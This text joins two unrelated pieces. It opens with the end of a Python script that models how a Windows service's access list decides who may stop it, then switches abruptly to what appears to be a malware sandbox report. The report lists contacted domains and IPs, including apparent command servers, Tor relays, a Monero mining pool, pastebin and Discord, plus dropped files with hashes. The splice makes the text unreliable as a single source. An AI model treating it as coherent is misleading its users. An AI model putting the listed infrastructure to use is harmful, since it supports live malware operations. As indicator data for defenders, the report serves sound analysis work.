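def effective_rights(sddl: str, token_sids: Set[str]) -> Set[str]:
    """Walk the DACL in order, as AccessCheck does: for each right, the first
    ACE that names it and applies to one of the token's SIDs decides (allow
    grants, deny refuses); a right no ACE mentions is refused."""
    decided: Dict[str, bool] = {}
    for ace in parse_sddl(sddl)["D"]:
        if ace.kind not in ("A", "D") or ace.sid not in token_sids:
            continue
        for code in ace.rights:
            decided.setdefault(code, ace.kind == "A")
    return {SERVICE_RIGHTS[c] for c, ok in decided.items() if ok}


def can_stop(sddl: str, token_sids: Set[str]) -> bool:
    return "SERVICE_STOP" in effective_rights(sddl, token_sids)


def describe(sddl: str) -> List[str]:
    """One readable line per DACL ACE."""
    lines = []
    for ace in parse_sddl(sddl)["D"]:
        verb = {"A": "allow", "D": "DENY "}.get(ace.kind, ace.kind)
        who = WELL_KNOWN.get(ace.sid, ace.sid)
        names = " ".join(sorted(SERVICE_RIGHTS[c] for c in ace.rights))
        lines.append(f"{verb} {who:<14} {names}")
    return lines


if __name__ == "__main__":
    print("\n".join(describe(REPORT_SDDL)))
    print("SYSTEM can stop:", can_stop(REPORT_SDDL, {"SY"}))
    print("Admin  can stop:", can_stop(REPORT_SDDL, ADMIN_TOKEN))
    print("Admin keeps:", sorted(effective_rights(REPORT_SDDL, ADMIN_TOKEN)))
```

The useful output for response is what Administrators keep rather than what they lose: the allow ACE still grants WRITE_DAC, SERVICE_CHANGE_CONFIG and DELETE, so an elevated shell can reset the descriptor with `sc sdset` (or delete the service outright) and only then stop it. The function models the DACL walk only; owner rights, SeTakeOwnershipPrivilege and the SACL are outside this example.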

Network

Country Destination Domain Proto
US 8.8.8.8:53 selebration17io.io udp
RU 91.215.85.120:80 selebration17io.io tcp
US 8.8.8.8:53 120.85.215.91.in-addr.arpa udp
UA 134.249.185.176:9001 tcp
N/A 127.0.0.1:49797 tcp
US 85.209.158.115:443 tcp
GB 31.127.34.9:9001 tcp
DE 185.172.128.19:80 185.172.128.19 tcp
US 8.8.8.8:53 19.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 resergvearyinitiani.shop udp
US 172.67.217.100:443 resergvearyinitiani.shop tcp
US 8.8.8.8:53 technologyenterdo.shop udp
US 104.21.80.118:443 technologyenterdo.shop tcp
US 8.8.8.8:53 lighterepisodeheighte.fun udp
US 8.8.8.8:53 problemregardybuiwo.fun udp
US 8.8.8.8:53 100.217.67.172.in-addr.arpa udp
US 8.8.8.8:53 118.80.21.104.in-addr.arpa udp
US 8.8.8.8:53 detectordiscusser.shop udp
US 104.21.60.92:443 detectordiscusser.shop tcp
US 8.8.8.8:53 trmpc.com udp
US 8.8.8.8:53 edurestunningcrackyow.fun udp
US 8.8.8.8:53 92.60.21.104.in-addr.arpa udp
US 8.8.8.8:53 pooreveningfuseor.pw udp
US 8.8.8.8:53 turkeyunlikelyofw.shop udp
KR 210.182.29.70:80 trmpc.com tcp
US 172.67.202.191:443 turkeyunlikelyofw.shop tcp
US 8.8.8.8:53 191.202.67.172.in-addr.arpa udp
US 8.8.8.8:53 70.29.182.210.in-addr.arpa udp
US 8.8.8.8:53 associationokeo.shop udp
US 104.21.10.242:443 associationokeo.shop tcp
DE 185.172.128.90:80 185.172.128.90 tcp
US 8.8.8.8:53 242.10.21.104.in-addr.arpa udp
US 8.8.8.8:53 90.128.172.185.in-addr.arpa udp
DE 185.172.128.127:80 185.172.128.127 tcp
US 8.8.8.8:53 127.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 en.bestsup.su udp
US 104.21.29.103:80 en.bestsup.su tcp
US 8.8.8.8:53 103.29.21.104.in-addr.arpa udp
DE 185.172.128.145:80 tcp
FR 163.172.29.34:443 tcp
US 8.8.8.8:53 145.128.172.185.in-addr.arpa udp
CH 46.19.141.85:8100 tcp
NL 45.66.33.45:443 tcp
DE 188.68.53.92:443 tcp
AT 5.42.64.33:80 5.42.64.33 tcp
US 8.8.8.8:53 33.64.42.5.in-addr.arpa udp
US 75.176.45.87:9001 tcp
AT 86.59.21.38:443 tcp
US 8.8.8.8:53 38.21.59.86.in-addr.arpa udp
FI 65.21.85.98:9001 tcp
IT 129.152.8.9:443 tcp
US 8.8.8.8:53 9.8.152.129.in-addr.arpa udp
US 8.8.8.8:53 98.85.21.65.in-addr.arpa udp
IT 129.152.8.9:443 tcp
FI 65.21.85.98:9001 tcp
US 8.8.8.8:53 sjyey.com udp
KR 211.181.24.132:80 sjyey.com tcp
US 8.8.8.8:53 132.24.181.211.in-addr.arpa udp
KR 211.181.24.132:80 sjyey.com tcp
US 8.8.8.8:53 e77bbb5a-182c-4ff3-ad31-530a3ea1a1d0.uuid.statsexplorer.org udp
KR 211.181.24.132:80 sjyey.com tcp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
NL 51.15.61.114:14433 xmr-eu2.nanopool.org tcp
US 8.8.8.8:53 114.61.15.51.in-addr.arpa udp
KR 211.181.24.132:80 sjyey.com tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
US 8.8.8.8:53 143.67.20.104.in-addr.arpa udp
KR 211.181.24.132:80 sjyey.com tcp
KR 211.181.24.132:80 sjyey.com tcp
KR 211.181.24.132:80 sjyey.com tcp
US 8.8.8.8:53 hejmbol.cem udp
KR 211.181.24.132:80 sjyey.com tcp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 eujleek.cem udp
US 8.8.8.8:53 skelers.erg udp
US 8.8.8.8:53 eujleek.cem udp
US 8.8.8.8:53 skelers.erg udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 eujleek.cem udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 esmbklj.edu.bb udp
US 8.8.8.8:53 skelers.erg udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 esmbklj.edu.bb udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 eujleek.cem udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 eujleek.cem udp
US 8.8.8.8:53 skelers.erg udp
US 8.8.8.8:53 esmbklj.edu.bb udp
US 8.8.8.8:53 eujleek.cem udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 yee.erg.jr udp
US 8.8.8.8:53 skelers.erg udp
US 8.8.8.8:53 yee.erg.jr udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 geeglejrbvel.cem.pk udp
US 8.8.8.8:53 geeglejrbvel.cem.pk udp
US 8.8.8.8:53 skelers.erg udp
US 8.8.8.8:53 yee.erg.jr udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 yee.erg.jr udp
US 8.8.8.8:53 eujleek.cem udp
US 8.8.8.8:53 geeglejrbvel.cem.pk udp
US 8.8.8.8:53 geeglejrbvel.cem.pk udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 yee.erg.jr udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 sedmb-eszevzb.edu.bb udp
US 8.8.8.8:53 sedmb-eszevzb.edu.bb udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 bblkbz-scheel.cem udp
US 8.8.8.8:53 bblkbz-scheel.cem udp
US 8.8.8.8:53 embolbex.fuz udp
US 8.8.8.8:53 embolbex.fuz udp
US 8.8.8.8:53 jelefezocb.cem udp
US 8.8.8.8:53 esmbklj.edu.bb udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 skelers.erg udp
US 8.8.8.8:53 jelefezocb.cem udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 cps.sp.gev.br udp
US 8.8.8.8:53 eujleek.cem udp
US 8.8.8.8:53 cps.sp.gev.br udp
US 8.8.8.8:53 eujleek.cem udp
US 8.8.8.8:53 sozhgbd.edu udp
US 8.8.8.8:53 sozhgbd.edu udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 esmbklj.edu.bb udp
US 8.8.8.8:53 www.sozhgbd.edu udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 skelers.erg udp
US 8.8.8.8:53 www.sozhgbd.edu udp
US 8.8.8.8:53 skelers.erg udp
US 8.8.8.8:53 jbblom.mb udp
US 8.8.8.8:53 jbblom.mb udp
US 8.8.8.8:53 eujleek.cem udp
US 8.8.8.8:53 ybhee.fr udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 esmbklj.edu.bb udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 yee.erg.jr udp
US 8.8.8.8:53 yee.erg.jr udp
US 8.8.8.8:53 eujleek.cem udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 skelers.erg udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 loder.soedlce.pl udp
US 8.8.8.8:53 loder.soedlce.pl udp
US 8.8.8.8:53 gmbol.ceem udp
US 8.8.8.8:53 gmbol.ceem udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 esmbklj.edu.bb udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 skelers.erg udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 ocleud.cem udp
US 8.8.8.8:53 eujleek.cem udp
US 8.8.8.8:53 ocleud.cem udp
US 8.8.8.8:53 ybhee.fr udp
US 8.8.8.8:53 ybhee.fr udp
US 8.8.8.8:53 gmbol.ce udp
US 8.8.8.8:53 gmbol.ce udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 gmbol.cempr udp
US 8.8.8.8:53 yee.erg.jr udp
US 8.8.8.8:53 gmbol.cempr udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 skelers.erg udp
US 8.8.8.8:53 love.cem udp
US 8.8.8.8:53 love.cem udp
US 8.8.8.8:53 yee.erg.jr udp
US 8.8.8.8:53 eujleek.cem udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 eujleek.cem udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 dmbvbluevbcbjoezs.cem udp
US 8.8.8.8:53 dmbvbluevbcbjoezs.cem udp
US 8.8.8.8:53 geeglejrbvel.cem.pk udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 eujleek.cem udp
US 8.8.8.8:53 yee.erg.jr udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 cbrobsurf.cem udp
US 8.8.8.8:53 love.cem udp
US 8.8.8.8:53 cbrobsurf.cem udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 love.cem udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 gmbol.ce udp
US 8.8.8.8:53 gmbol.ce udp
US 8.8.8.8:53 geeglejrbvel.cem.pk udp
US 8.8.8.8:53 mee-dl.edu.my udp
US 8.8.8.8:53 mee-dl.edu.my udp
US 8.8.8.8:53 skelers.erg udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 bkjbs.cem udp
US 8.8.8.8:53 love.cem udp
US 8.8.8.8:53 bkjbs.cem udp
US 8.8.8.8:53 bluze.ezevb.educbcbe.bb.gev.br udp
US 8.8.8.8:53 bluze.ezevb.educbcbe.bb.gev.br udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 ybhee.oj udp
US 8.8.8.8:53 ybhee.oj udp
US 8.8.8.8:53 mee.be udp
US 8.8.8.8:53 yee.erg.jr udp
US 8.8.8.8:53 mee.be udp
US 8.8.8.8:53 ocleud.cem udp
US 8.8.8.8:53 ocleud.cem udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 eujleek.cem udp
US 8.8.8.8:53 dezgguk.bc.kr udp
US 8.8.8.8:53 dezgguk.bc.kr udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 geeglejrbvel.cem.pk udp
US 8.8.8.8:53 bbu.edu.bd udp
US 8.8.8.8:53 bbu.edu.bd udp
US 8.8.8.8:53 dgu.bc.kr udp
US 8.8.8.8:53 dgu.bc.kr udp
US 8.8.8.8:53 sedmb-eszevzb.edu.bb udp
US 8.8.8.8:53 eolzews.cem udp
US 8.8.8.8:53 eolzews.cem udp
US 8.8.8.8:53 hexds.cem udp
US 8.8.8.8:53 hexds.cem udp
US 8.8.8.8:53 zezod.cem udp
US 8.8.8.8:53 zezod.cem udp
US 8.8.8.8:53 kbfjee.cem udp
US 8.8.8.8:53 kbfjee.cem udp
US 8.8.8.8:53 bblkbz-scheel.cem udp
US 8.8.8.8:53 qubmex.cem udp
US 8.8.8.8:53 je6s.cem udp
US 8.8.8.8:53 je6s.cem udp
US 8.8.8.8:53 qubmex.cem udp
US 8.8.8.8:53 kurubpp.cem udp
US 8.8.8.8:53 kurubpp.cem udp
US 8.8.8.8:53 love.cem udp
US 8.8.8.8:53 embolbex.fuz udp
US 8.8.8.8:53 love.cem udp
US 8.8.8.8:53 vbsqb.cem udp
US 8.8.8.8:53 vbsqb.cem udp
US 8.8.8.8:53 ebsebre.cem udp
US 8.8.8.8:53 ebsebre.cem udp
US 8.8.8.8:53 jelefezocb.cem udp
US 8.8.8.8:53 esmbklj.edu.bb udp
US 8.8.8.8:53 skelers.erg udp
US 8.8.8.8:53 cps.sp.gev.br udp
US 8.8.8.8:53 sozhgbd.edu udp
US 8.8.8.8:53 www.sozhgbd.edu udp
US 8.8.8.8:53 jbblom.mb udp
US 8.8.8.8:53 ybhee.fr udp
US 8.8.8.8:53 loder.soedlce.pl udp
US 8.8.8.8:53 gmbol.ceem udp
US 8.8.8.8:53 gmbol.ce udp
US 8.8.8.8:53 gmbol.cempr udp
US 8.8.8.8:53 dmbvbluevbcbjoezs.cem udp
US 8.8.8.8:53 cbrobsurf.cem udp
US 8.8.8.8:53 mee-dl.edu.my udp
KR 211.181.24.132:80 sjyey.com tcp
US 8.8.8.8:53 bkjbs.cem udp
US 8.8.8.8:53 bluze.ezevb.educbcbe.bb.gev.br udp
US 8.8.8.8:53 105.246.116.51.in-addr.arpa udp
US 8.8.8.8:53 129.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 server2.statsexplorer.org udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 stun.sipgate.net udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 3.33.249.248:3478 stun.sipgate.net udp
BG 185.82.216.108:443 server2.statsexplorer.org tcp
US 8.8.8.8:53 walkinglate.com udp
US 172.67.212.188:443 walkinglate.com tcp
US 8.8.8.8:53 248.249.33.3.in-addr.arpa udp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
US 8.8.8.8:53 108.216.82.185.in-addr.arpa udp
US 8.8.8.8:53 188.212.67.172.in-addr.arpa udp
BG 185.82.216.108:443 server2.statsexplorer.org tcp
N/A 127.0.0.1:41152 tcp
N/A 127.0.0.1:41152 tcp
N/A 127.0.0.1:41152 tcp
N/A 127.0.0.1:41152 tcp
N/A 127.0.0.1:41152 tcp
N/A 127.0.0.1:51974 tcp
N/A 127.0.0.1:51978 tcp
N/A 127.0.0.1:51983 tcp
N/A 127.0.0.1:51988 tcp
N/A 127.0.0.1:51991 tcp
N/A 127.0.0.1:51996 tcp
N/A 127.0.0.1:52010 tcp
N/A 127.0.0.1:52012 tcp
N/A 127.0.0.1:52014 tcp
N/A 127.0.0.1:52016 tcp
N/A 127.0.0.1:52018 tcp
N/A 127.0.0.1:52021 tcp
N/A 127.0.0.1:52024 tcp
N/A 127.0.0.1:52027 tcp
N/A 127.0.0.1:52038 tcp
N/A 127.0.0.1:52041 tcp
N/A 127.0.0.1:52045 tcp
N/A 127.0.0.1:52048 tcp
N/A 127.0.0.1:52051 tcp
N/A 127.0.0.1:52056 tcp
N/A 127.0.0.1:52059 tcp
N/A 127.0.0.1:52063 tcp
N/A 127.0.0.1:52069 tcp
N/A 127.0.0.1:52074 tcp
N/A 127.0.0.1:52077 tcp
N/A 127.0.0.1:52081 tcp
N/A 127.0.0.1:52084 tcp
N/A 127.0.0.1:52087 tcp
N/A 127.0.0.1:52089 tcp
N/A 127.0.0.1:52093 tcp
N/A 127.0.0.1:52097 tcp
N/A 127.0.0.1:52103 tcp
N/A 127.0.0.1:52105 tcp
N/A 127.0.0.1:52107 tcp
N/A 127.0.0.1:52111 tcp
N/A 127.0.0.1:52122 tcp
N/A 127.0.0.1:52127 tcp
N/A 127.0.0.1:52130 tcp
N/A 127.0.0.1:52139 tcp
N/A 127.0.0.1:52141 tcp
N/A 127.0.0.1:52146 tcp
N/A 127.0.0.1:52151 tcp
N/A 127.0.0.1:52154 tcp
N/A 127.0.0.1:52156 tcp
N/A 127.0.0.1:52158 tcp
N/A 127.0.0.1:52162 tcp
N/A 127.0.0.1:52165 tcp
N/A 127.0.0.1:52168 tcp
N/A 127.0.0.1:52173 tcp
N/A 127.0.0.1:52175 tcp
N/A 127.0.0.1:52178 tcp
N/A 127.0.0.1:52184 tcp
N/A 127.0.0.1:52189 tcp
N/A 127.0.0.1:52192 tcp
N/A 127.0.0.1:52199 tcp
N/A 127.0.0.1:52202 tcp
N/A 127.0.0.1:52205 tcp
N/A 127.0.0.1:52212 tcp
N/A 127.0.0.1:52215 tcp
N/A 127.0.0.1:52218 tcp
N/A 127.0.0.1:52221 tcp
N/A 127.0.0.1:52224 tcp
N/A 127.0.0.1:52227 tcp
N/A 127.0.0.1:52233 tcp
N/A 127.0.0.1:52236 tcp
N/A 127.0.0.1:52239 tcp
N/A 127.0.0.1:52247 tcp
N/A 127.0.0.1:52250 tcp
N/A 127.0.0.1:52255 tcp
N/A 127.0.0.1:52260 tcp
N/A 127.0.0.1:52262 tcp
N/A 127.0.0.1:52266 tcp
N/A 127.0.0.1:52275 tcp
N/A 127.0.0.1:52278 tcp
N/A 127.0.0.1:52281 tcp
N/A 127.0.0.1:52285 tcp
N/A 127.0.0.1:52289 tcp
N/A 127.0.0.1:52298 tcp
N/A 127.0.0.1:52302 tcp
N/A 127.0.0.1:52306 tcp
N/A 127.0.0.1:52310 tcp
N/A 127.0.0.1:52313 tcp
N/A 127.0.0.1:52316 tcp
N/A 127.0.0.1:52321 tcp
N/A 127.0.0.1:52326 tcp
N/A 127.0.0.1:52330 tcp
N/A 127.0.0.1:52332 tcp
N/A 127.0.0.1:52338 tcp
N/A 127.0.0.1:52340 tcp
N/A 127.0.0.1:52345 tcp
N/A 127.0.0.1:52350 tcp
N/A 127.0.0.1:52353 tcp
N/A 127.0.0.1:52358 tcp
N/A 127.0.0.1:52365 tcp
N/A 127.0.0.1:52368 tcp
N/A 127.0.0.1:52373 tcp
N/A 127.0.0.1:52379 tcp
N/A 127.0.0.1:52382 tcp
N/A 127.0.0.1:52385 tcp
N/A 127.0.0.1:52389 tcp
N/A 127.0.0.1:52393 tcp
N/A 127.0.0.1:52398 tcp
N/A 127.0.0.1:52402 tcp
N/A 127.0.0.1:52405 tcp
N/A 127.0.0.1:52407 tcp
N/A 127.0.0.1:52410 tcp
N/A 127.0.0.1:52413 tcp
N/A 127.0.0.1:52418 tcp
N/A 127.0.0.1:52422 tcp
N/A 127.0.0.1:52428 tcp
N/A 127.0.0.1:52432 tcp
N/A 127.0.0.1:52439 tcp
N/A 127.0.0.1:52441 tcp
N/A 127.0.0.1:52446 tcp
N/A 127.0.0.1:52449 tcp
N/A 127.0.0.1:52454 tcp
N/A 127.0.0.1:52459 tcp
N/A 127.0.0.1:52462 tcp
N/A 127.0.0.1:52471 tcp
N/A 127.0.0.1:52474 tcp
N/A 127.0.0.1:52480 tcp
N/A 127.0.0.1:52482 tcp
N/A 127.0.0.1:52484 tcp
N/A 127.0.0.1:52488 tcp
N/A 127.0.0.1:52491 tcp
N/A 127.0.0.1:52500 tcp
N/A 127.0.0.1:52504 tcp
N/A 127.0.0.1:52506 tcp
N/A 127.0.0.1:52509 tcp
N/A 127.0.0.1:52514 tcp
N/A 127.0.0.1:52520 tcp
N/A 127.0.0.1:52522 tcp
N/A 127.0.0.1:52525 tcp
N/A 127.0.0.1:52535 tcp
N/A 127.0.0.1:52537 tcp
N/A 127.0.0.1:52541 tcp
N/A 127.0.0.1:52546 tcp
N/A 127.0.0.1:52551 tcp
N/A 127.0.0.1:52556 tcp
N/A 127.0.0.1:52558 tcp
N/A 127.0.0.1:52560 tcp
N/A 127.0.0.1:52563 tcp
N/A 127.0.0.1:52569 tcp
N/A 127.0.0.1:52573 tcp
N/A 127.0.0.1:52579 tcp
N/A 127.0.0.1:52580 tcp
N/A 127.0.0.1:52584 tcp
N/A 127.0.0.1:52588 tcp
N/A 127.0.0.1:52596 tcp
N/A 127.0.0.1:52598 tcp
N/A 127.0.0.1:52604 tcp
N/A 127.0.0.1:52608 tcp
N/A 127.0.0.1:52612 tcp
N/A 127.0.0.1:52617 tcp
N/A 127.0.0.1:52619 tcp
N/A 127.0.0.1:52626 tcp
N/A 127.0.0.1:52628 tcp
N/A 127.0.0.1:52632 tcp
N/A 127.0.0.1:52643 tcp
N/A 127.0.0.1:52647 tcp
N/A 127.0.0.1:52651 tcp
N/A 127.0.0.1:52655 tcp
N/A 127.0.0.1:52659 tcp
N/A 127.0.0.1:52661 tcp
N/A 127.0.0.1:52664 tcp
N/A 127.0.0.1:52674 tcp
N/A 127.0.0.1:52680 tcp
N/A 127.0.0.1:52682 tcp
N/A 127.0.0.1:52685 tcp
N/A 127.0.0.1:52692 tcp
N/A 127.0.0.1:52694 tcp
N/A 127.0.0.1:52697 tcp
N/A 127.0.0.1:52702 tcp
N/A 127.0.0.1:52705 tcp
N/A 127.0.0.1:52709 tcp
N/A 127.0.0.1:52718 tcp
N/A 127.0.0.1:52721 tcp
N/A 127.0.0.1:52725 tcp
N/A 127.0.0.1:52727 tcp
N/A 127.0.0.1:52732 tcp
N/A 127.0.0.1:52736 tcp
N/A 127.0.0.1:52739 tcp
N/A 127.0.0.1:52744 tcp
N/A 127.0.0.1:52747 tcp
N/A 127.0.0.1:52753 tcp
N/A 127.0.0.1:52762 tcp
N/A 127.0.0.1:52764 tcp
N/A 127.0.0.1:52768 tcp
N/A 127.0.0.1:52775 tcp
N/A 127.0.0.1:52777 tcp
N/A 127.0.0.1:52780 tcp
N/A 127.0.0.1:52783 tcp
N/A 127.0.0.1:52787 tcp
N/A 127.0.0.1:52793 tcp
N/A 127.0.0.1:52800 tcp
N/A 127.0.0.1:52804 tcp
N/A 127.0.0.1:52807 tcp
N/A 127.0.0.1:52814 tcp
N/A 127.0.0.1:52818 tcp
N/A 127.0.0.1:41152 tcp
N/A 127.0.0.1:52822 tcp
N/A 127.0.0.1:52825 tcp
N/A 127.0.0.1:52832 tcp
N/A 127.0.0.1:52836 tcp
N/A 127.0.0.1:52840 tcp
N/A 127.0.0.1:52848 tcp
N/A 127.0.0.1:52852 tcp
N/A 127.0.0.1:52854 tcp
N/A 127.0.0.1:52858 tcp
N/A 127.0.0.1:52867 tcp
N/A 127.0.0.1:52871 tcp
N/A 127.0.0.1:52875 tcp
N/A 127.0.0.1:52881 tcp
N/A 127.0.0.1:52883 tcp
N/A 127.0.0.1:52886 tcp
N/A 127.0.0.1:52888 tcp
N/A 127.0.0.1:52892 tcp
N/A 127.0.0.1:52895 tcp
N/A 127.0.0.1:52900 tcp
N/A 127.0.0.1:52904 tcp
N/A 127.0.0.1:52908 tcp
N/A 127.0.0.1:52912 tcp
N/A 127.0.0.1:52915 tcp
N/A 127.0.0.1:52920 tcp
N/A 127.0.0.1:52922 tcp
N/A 127.0.0.1:52932 tcp
N/A 127.0.0.1:52936 tcp
N/A 127.0.0.1:52940 tcp
N/A 127.0.0.1:52944 tcp
N/A 127.0.0.1:52948 tcp
N/A 127.0.0.1:52954 tcp
N/A 127.0.0.1:52957 tcp
N/A 127.0.0.1:52961 tcp
N/A 127.0.0.1:52964 tcp
N/A 127.0.0.1:52973 tcp
N/A 127.0.0.1:52975 tcp
N/A 127.0.0.1:52979 tcp
N/A 127.0.0.1:52984 tcp
N/A 127.0.0.1:52988 tcp
N/A 127.0.0.1:52992 tcp
N/A 127.0.0.1:52995 tcp
N/A 127.0.0.1:52999 tcp
N/A 127.0.0.1:53002 tcp
N/A 127.0.0.1:53009 tcp
N/A 127.0.0.1:53013 tcp
N/A 127.0.0.1:53021 tcp
N/A 127.0.0.1:53024 tcp
N/A 127.0.0.1:53026 tcp
N/A 127.0.0.1:53032 tcp
N/A 127.0.0.1:53037 tcp
N/A 127.0.0.1:53043 tcp
N/A 127.0.0.1:53046 tcp
N/A 127.0.0.1:53049 tcp
N/A 127.0.0.1:53053 tcp
N/A 127.0.0.1:53057 tcp
N/A 127.0.0.1:53063 tcp
N/A 127.0.0.1:53065 tcp
N/A 127.0.0.1:53069 tcp
N/A 127.0.0.1:53073 tcp
N/A 127.0.0.1:53075 tcp
N/A 127.0.0.1:53081 tcp
N/A 127.0.0.1:53084 tcp
N/A 127.0.0.1:53087 tcp
N/A 127.0.0.1:53091 tcp
N/A 127.0.0.1:53096 tcp
N/A 127.0.0.1:53099 tcp
N/A 127.0.0.1:53104 tcp
N/A 127.0.0.1:53110 tcp
N/A 127.0.0.1:53115 tcp
N/A 127.0.0.1:53117 tcp
N/A 127.0.0.1:53120 tcp
N/A 127.0.0.1:53126 tcp
N/A 127.0.0.1:53131 tcp
N/A 127.0.0.1:53134 tcp
N/A 127.0.0.1:53137 tcp
N/A 127.0.0.1:53147 tcp
N/A 127.0.0.1:53150 tcp
N/A 127.0.0.1:53154 tcp
N/A 127.0.0.1:53159 tcp
N/A 127.0.0.1:53161 tcp
N/A 127.0.0.1:53165 tcp
N/A 127.0.0.1:53168 tcp
N/A 127.0.0.1:53172 tcp
N/A 127.0.0.1:53175 tcp
N/A 127.0.0.1:53181 tcp
N/A 127.0.0.1:53186 tcp
N/A 127.0.0.1:53188 tcp
N/A 127.0.0.1:53191 tcp
N/A 127.0.0.1:53197 tcp
N/A 127.0.0.1:53202 tcp
N/A 127.0.0.1:53209 tcp
N/A 127.0.0.1:53214 tcp
N/A 127.0.0.1:53217 tcp
N/A 127.0.0.1:53221 tcp
N/A 127.0.0.1:53224 tcp
N/A 127.0.0.1:53226 tcp
N/A 127.0.0.1:53229 tcp
N/A 127.0.0.1:53233 tcp
N/A 127.0.0.1:53236 tcp
N/A 127.0.0.1:53242 tcp
N/A 127.0.0.1:53246 tcp
N/A 127.0.0.1:53250 tcp
N/A 127.0.0.1:53254 tcp
N/A 127.0.0.1:53259 tcp
N/A 127.0.0.1:53264 tcp
N/A 127.0.0.1:53267 tcp
N/A 127.0.0.1:53271 tcp
N/A 127.0.0.1:53280 tcp
N/A 127.0.0.1:53285 tcp
N/A 127.0.0.1:53291 tcp
N/A 127.0.0.1:53295 tcp
N/A 127.0.0.1:53297 tcp
N/A 127.0.0.1:53300 tcp
N/A 127.0.0.1:53303 tcp
N/A 127.0.0.1:53310 tcp
N/A 127.0.0.1:53311 tcp
N/A 127.0.0.1:53316 tcp
N/A 127.0.0.1:53321 tcp
N/A 127.0.0.1:53324 tcp
N/A 127.0.0.1:53327 tcp
N/A 127.0.0.1:53333 tcp
N/A 127.0.0.1:53337 tcp
N/A 127.0.0.1:53343 tcp
N/A 127.0.0.1:53345 tcp
N/A 127.0.0.1:53349 tcp
N/A 127.0.0.1:53354 tcp
N/A 127.0.0.1:53360 tcp
N/A 127.0.0.1:53363 tcp
N/A 127.0.0.1:53367 tcp
N/A 127.0.0.1:53371 tcp
N/A 127.0.0.1:53375 tcp
N/A 127.0.0.1:53380 tcp

Files


C:\Users\Admin\AppData\Local\Temp\nsf11EF.tmp

MD5 98f75ae139d548677e3c0ff45c24ed08
SHA1 9052843267fd24e8d4dd700d121506a6ccd6935b
SHA256 83764623a1b1038a7b28ac61a156ca7cdeed91f38c0e3ceb211a3e9380cbdfbe
SHA512 a2efd41d8285b4d506058c0d2e7a01a5a053e0e48932835997778b563c47b6762e3f36c2c49c327513f845735132fa4be5ea2a4609a56352c44f181f2a0d8bbb

memory/1952-138-0x0000000002320000-0x0000000002420000-memory.dmp

memory/1952-139-0x0000000002300000-0x000000000230B000-memory.dmp

memory/1952-141-0x0000000000400000-0x00000000022D1000-memory.dmp

memory/4344-142-0x0000000002430000-0x0000000002464000-memory.dmp

memory/4344-143-0x0000000000400000-0x00000000022DC000-memory.dmp

C:\Users\Admin\AppData\Roaming\Temp\Task.bat

MD5 11bb3db51f701d4e42d3287f71a6a43e
SHA1 63a4ee82223be6a62d04bdfe40ef8ba91ae49a86
SHA256 6be22058abfb22b40a42fb003f86b89e204a83024c03eb82cd53e2a0a047c331
SHA512 907ad2c070cc1db89f43459a94d7f48985d939d749c9648b78572a266f0d3fde47813a129e9151dbf4a7d96d36f588172f57c88b8b947b56ed818d7d068abab2

memory/4344-144-0x00000000025F0000-0x00000000026F0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\24EE.exe

MD5 072d7d76c6b846d7a9141073f1384e38
SHA1 293e0273e53c14576fc5a96106596b50b528fcb5
SHA256 427e0017a4a25dd2d3fe4b29bc762742ef1bbf59b28ef13aad632caba77577f7
